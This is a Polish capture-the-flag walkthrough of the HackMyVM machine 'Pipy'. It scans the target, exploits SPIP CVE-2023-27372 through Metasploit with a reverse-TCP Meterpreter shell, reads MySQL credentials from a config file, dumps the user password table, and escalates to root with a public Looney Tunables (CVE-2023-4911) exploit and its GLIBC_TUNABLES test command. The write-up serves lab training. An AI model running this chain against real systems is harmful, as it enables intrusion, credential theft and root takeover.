Pipy - ruycr4ft
00. Metainfo
| Nazwa: | Pipy |
| Autor: | ruycr4ft |
| Wypuszczony: | 2023-10-18 |
| Ściągnij: | HackMyVM |
| Poziom: | Łatwy |
| System: | Linux |
| Nauczysz się: | Podatności CVE |
01. Wstęp
Pipy jest dosyć ciekawą maszynką, w której łamanie zbliżone jest do łamania stron w internecie. Jest ona po hiszpańsku, ale nie przeszkadza to zbytnio aby się po niej poruszać. Wcześniej miałem do czynienia z obrazem Za1, w której jest język chiński!!! Powiem wam - masakra. Ale od tego są translatory? Wracając do Pipy - są na niej typowe podatności, spotykane w aplikacjach i do tego w CVE. Do tego są dosyć świeże, sytuacja - listopad 2023 roku.
02. Skanowanie
Skanowanie maszynki pokazało dwa otwarte porty 80 i 22. Czyli jest na razie bardzo typowo.
msf6 > db_nmap 172.16.1.111
[*] Nmap: Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-11-12 00:12 CET
[*] Nmap: Nmap scan report for pipy.lan (172.16.1.111)
[*] Nmap: Host is up (0.0010s latency).
[*] Nmap: Not shown: 998 closed tcp ports (reset)
[*] Nmap: PORT STATE SERVICE
[*] Nmap: 22/tcp open ssh
[*] Nmap: 80/tcp open http
[*] Nmap: MAC Address: 08:00:27:D4:FF:14 (Oracle VirtualBox virtual NIC)
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 0.27 seconds
03. Spip i CVE-2023-27372
Wchodząc na stronę, tak się ona prezentuje.
Szukając na necie możemy poczytać, że SPIP jest systemem zarządzania treścią stworzonym pierwotnie przez minirézo w celu administracji serwisem. Wygląda na to, że jest to większa aplikacja, w stylu Wordpress, a nie tylko sama strona stworzona na potrzeby złamania maszyny. Skanując Feroxbusterem mamy od groma wyników, które szkoda czasu przeglądać.
root@kali2023:~# feroxbuster -u http://172.16.1.111
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.10.0
───────────────────────────┬──────────────────────
🎯 Target Url │ http://172.16.1.111
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.10.0
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 9l 31w 274c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403 GET 9l 28w 277c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301 GET 9l 28w 310c http://172.16.1.111/tmp => http://172.16.1.111/tmp/
200 GET 1l 2w 14c http://172.16.1.111/tmp/meta_cache.php
301 GET 9l 28w 313c http://172.16.1.111/config => http://172.16.1.111/config/
200 GET 0l 0w 0c http://172.16.1.111/config/ecran_securite.php
301 GET 9l 28w 317c http://172.16.1.111/javascript => http://172.16.1.111/javascript/
200 GET 140l 202w 1497c http://172.16.1.111/squelettes-dist/css/reset.css
200 GET 107l 232w 2093c http://172.16.1.111/squelettes-dist/css/links.css
200 GET 844l 12099w 102564c http://172.16.1.111/tmp/log/spip.log.1
200 GET 1l 30w 191c http://172.16.1.111/tmp/log/auth.log
301 GET 9l 28w 312c http://172.16.1.111/local => http://172.16.1.111/local/
200 GET 4l 23w 187c http://172.16.1.111/local/CACHEDIR.TAG
200 GET 3l 13w 83c http://172.16.1.111/local/remove.txt
200 GET 705l 1688w 22638c http://172.16.1.111/local/cache-js/jsdyn-javascript_porte_plume_start_js-32d0edfd.js.last
200 GET 705l 1688w 22638c http://172.16.1.111/local/cache-js/jsdyn-javascript_porte_plume_start_js-13fb4c3e.js
200 GET 705l 1688w 22638c http://172.16.1.111/local/cache-js/jsdyn-javascript_porte_plume_start_js-511d27b4.js
200 GET 48l 125w 1145c http://172.16.1.111/local/cache-js/jsdyn-javascript_bigup_trads_js-d96dfd1d.js.last
200 GET 3l 9w 289c http://172.16.1.111/local/cache-gd2/ac/ee1c4100e66342a18beacada39d3f5.png
301 GET 9l 28w 313c http://172.16.1.111/ecrire => http://172.16.1.111/ecrire/
301 GET 9l 28w 312c http://172.16.1.111/prive => http://172.16.1.111/prive/
200 GET 15l 46w 439c http://172.16.1.111/prive/spip_style_print.css
200 GET 371l 1466w 13268c http://172.16.1.111/prive/spip_admin.css
200 GET 124l 305w 3861c http://172.16.1.111/prive/javascript/gadgets.js
301 GET 9l 28w 322c http://172.16.1.111/squelettes-dist => http://172.16.1.111/squelettes-dist/
200 GET 10993l 45090w 293671c http://172.16.1.111/prive/javascript/jquery.js
200 GET 36l 67w 1504c http://172.16.1.111/squelettes-dist/backend.html
200 GET 24l 38w 739c http://172.16.1.111/squelettes-dist/calendrier.html
200 GET 26l 45w 1422c http://172.16.1.111/squelettes-dist/rss_forum_article.html
200 GET 3783l 11745w 123519c http://172.16.1.111/prive/javascript/Sortable.js
200 GET 26l 45w 1385c http://172.16.1.111/squelettes-dist/rss_forum_breve.html
200 GET 26l 45w 1397c http://172.16.1.111/squelettes-dist/rss_forum_rubrique.html
301 GET 9l 28w 313c http://172.16.1.111/vendor => http://172.16.1.111/vendor/
200 GET 0l 0w 0c http://172.16.1.111/vendor/autoload.php
200 GET 20l 101w 1221c http://172.16.1.111/vendor/jakeasmith/http_build_url/readme.md
...
Więc pójdźmy inną w stronę - podatność na aplikację. Sprawdźmy w Metasploicie czy jest jakaś podatność na Spip?
msf6 > search spip
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/webapp/spip_connect_exec 2012-07-04 excellent Yes SPIP connect Parameter PHP Injection
1 exploit/unix/webapp/spip_rce_form 2023-02-27 excellent Yes SPIP form PHP Injection
Interact with a module by name or index. For example info 1, use 1 or use exploit/unix/webapp/spip_rce_form
msf6 > use 1
[*] Using configured payload php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/spip_rce_form) > show options
Module options (exploit/unix/webapp/spip_rce_form):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit
.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI / yes The base path to SPIP application
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0
.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic (PHP In-Memory)
View the full module info with the info, or info -d command.
msf6 exploit(unix/webapp/spip_rce_form) > set lhost eth0
lhost => 172.16.1.89
msf6 exploit(unix/webapp/spip_rce_form) > set RHOSTS 172.16.1.111
RHOSTS => 172.16.1.111
msf6 exploit(unix/webapp/spip_rce_form) > run -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 172.16.1.89:4444
msf6 exploit(unix/webapp/spip_rce_form) > [*] Running automatic check ("set AutoCheck false" to disable)
[*] SPIP Version detected: 4.2.0
[+] The target appears to be vulnerable.
[*] Got anti-csrf token: iYe2q77AjJpzr7DiCN466DffCNPeUp0xMFqKM8HZ2jA5IWNjp6Vhzoioj1CV4d/wM8wzPYKIJAYCiLEY+fBNfgPHcNshG3+b
[*] 172.16.1.111:80 - Attempting to exploit...
[*] Sending stage (39927 bytes) to 172.16.1.111
[*] Meterpreter session 1 opened (172.16.1.89:4444 -> 172.16.1.111:53128) at 2023-11-12 00:28:35 +0100
msf6 exploit(unix/webapp/spip_rce_form) >
Jak widać wyżej, jest podatność opisana w CVE-2023-27372, którą wykorzystaliśmy.
04. Mysql
Wchodząc do katalogu /home widzimy użytkownika angela, to się przyda później.
meterpreter > cd /home
meterpreter > ls
Listing: /home
==============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040750/rwxr-x--- 4096 dir 2023-11-11 01:18:43 +0100 angela
Po krótkiej analizie widać, że jest i serwer Mysql, na który spróbujemy wejść. Będąc w katalogu /var/www/html/config mamy takie coś:
meterpreter > pwd
/var/www/html/config
meterpreter > cat connect.php
<?php
if (!defined("_ECRIRE_INC_VERSION")) return;
defined('_MYSQL_SET_SQL_MODE') || define('_MYSQL_SET_SQL_MODE',true);
$GLOBALS['spip_connect_version'] = 0.8;
spip_connect_db('localhost','','root','dbpassword','spip','mysql', 'spip','','');
Jest login i hasło, dzięki któremu wejdziemy na Mysql
meterpreter > shell
Process 2630 created.
Channel 3 created.
python
/bin/sh: 1: python: not found
python3 -c 'import pty; pty.spawn("bash");'
www-data@pipy:/var/www/html/config$
www-data@pipy:/var/www/html/config$ mysql -uroot -p
mysql -uroot -p
Enter password: dbpassword
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 46
Server version: 10.6.12-MariaDB-0ubuntu0.22.04.1 Ubuntu 22.04
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]>
MariaDB [(none)]> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| spip |
| sys |
+--------------------+
5 rows in set (0.000 sec)
MariaDB [(none)]> use spip;
use spip;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [spip]> show tables;
show tables;
+-------------------------+
| Tables_in_spip |
+-------------------------+
| spip_articles |
| spip_auteurs |
| spip_auteurs_liens |
| spip_depots |
| spip_depots_plugins |
| spip_documents |
| spip_documents_liens |
| spip_forum |
| spip_groupes_mots |
| spip_jobs |
| spip_jobs_liens |
| spip_meta |
| spip_mots |
| spip_mots_liens |
| spip_paquets |
| spip_plugins |
| spip_referers |
| spip_referers_articles |
| spip_resultats |
| spip_rubriques |
| spip_syndic |
| spip_syndic_articles |
| spip_types_documents |
| spip_urls |
| spip_versions |
| spip_versions_fragments |
| spip_visites |
| spip_visites_articles |
+-------------------------+
28 rows in set (0.000 sec)
MariaDB [spip]> desc spip_auteurs;
desc spip_auteurs;
+--------------+--------------+------+-----+---------------------+-------------------------------+
| Field | Type | Null | Key | Default | Extra |
+--------------+--------------+------+-----+---------------------+-------------------------------+
| id_auteur | bigint(21) | NO | PRI | NULL | auto_increment |
| nom | text | NO | | '' | |
| bio | text | NO | | '' | |
| email | tinytext | NO | | '' | |
| nom_site | tinytext | NO | | '' | |
| url_site | text | NO | | '' | |
| login | varchar(255) | YES | MUL | NULL | |
| pass | tinytext | NO | | '' | |
| low_sec | tinytext | NO | | '' | |
| statut | varchar(255) | NO | MUL | 0 | |
| webmestre | varchar(3) | NO | | non | |
| maj | timestamp | NO | | current_timestamp() | on update current_timestamp() |
| pgp | text | NO | | '' | |
| htpass | tinytext | NO | | '' | |
| en_ligne | datetime | NO | MUL | 0000-00-00 00:00:00 | |
| alea_actuel | tinytext | YES | | NULL | |
| alea_futur | tinytext | YES | | NULL | |
| prefs | text | YES | | NULL | |
| cookie_oubli | tinytext | YES | | NULL | |
| source | varchar(10) | NO | | spip | |
| lang | varchar(10) | NO | | | |
| imessage | varchar(3) | NO | | | |
| backup_cles | mediumtext | NO | | '' | |
+--------------+--------------+------+-----+---------------------+-------------------------------+
23 rows in set (0.001 sec)
MariaDB [spip]> select id_auteur, pass, htpass from spip_auteurs;
select id_auteur, pass, htpass from spip_auteurs;
+-----------+--------------------------------------------------------------+--------+
| id_auteur | pass | htpass |
+-----------+--------------------------------------------------------------+--------+
| 1 | 4ng3l4 | |
| 2 | $2y$10$.GR/i2bwnVInUmzdzSi10u66AKUUWGGDBNnA7IuIeZBZVtFMqTsZ2 | |
+-----------+--------------------------------------------------------------+--------+
2 rows in set (0.000 sec)
Wszystko co powyżej widać, jest tak intuicyjne, że nawet nie musiałem szukać informacji w necie. Nawet patrząc na id_auteur, zgadłem, że jest to użytkownik. Mamy hasło użytkownika angela.
05. Looney Tunables CVE-2023-4911
Ostatnio było głośno o podatności CVE-2023-4911, którą wykorzystamy. Ale najpierw sprawdźmy, czy jest na to podatność.
env -i "GLIBC_TUNABLES=glibc.malloc.mxfast=glibc.malloc.mxfast=A" "G=`printf '%08192x' 1`" /usr/bin/su --help
Segmentation fault (core dumped)
Jest Segmentation fault (core dumped), więc możemy spróbować eksploita, który jest tutaj.
unzip main.zip
Archive: main.zip
acf0d3a8bd4c437475a7c4c83f5790e53e8103cb
creating: CVE-2023-4911-main/
inflating: CVE-2023-4911-main/Makefile
inflating: CVE-2023-4911-main/README.md
inflating: CVE-2023-4911-main/exp.c
inflating: CVE-2023-4911-main/gen_libc.py
angela@pipy:/tmp$ cd CVE-2023-4911-main/
angela@pipy:/tmp/CVE-2023-4911-main$ make
gcc -o exp exp.c
python3 gen_libc.py
[*] Checking for new versions of pwntools
To disable this functionality, set the contents of /home/angela/.cache/.pwntools-cache-3.10/update to 'never' (old way).
Or add the following lines to ~/.pwn.conf or ~/.config/pwn.conf (or /etc/pwn.conf system-wide):
[update]
interval=never
[*] You have the latest version of Pwntools (4.11.0)
[*] '/lib/x86_64-linux-gnu/libc.so.6'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
./exp
# id
uid=0(root) gid=0(root) groups=0(root),1000(angela)
#
Jest i root.
Zostaw komentarz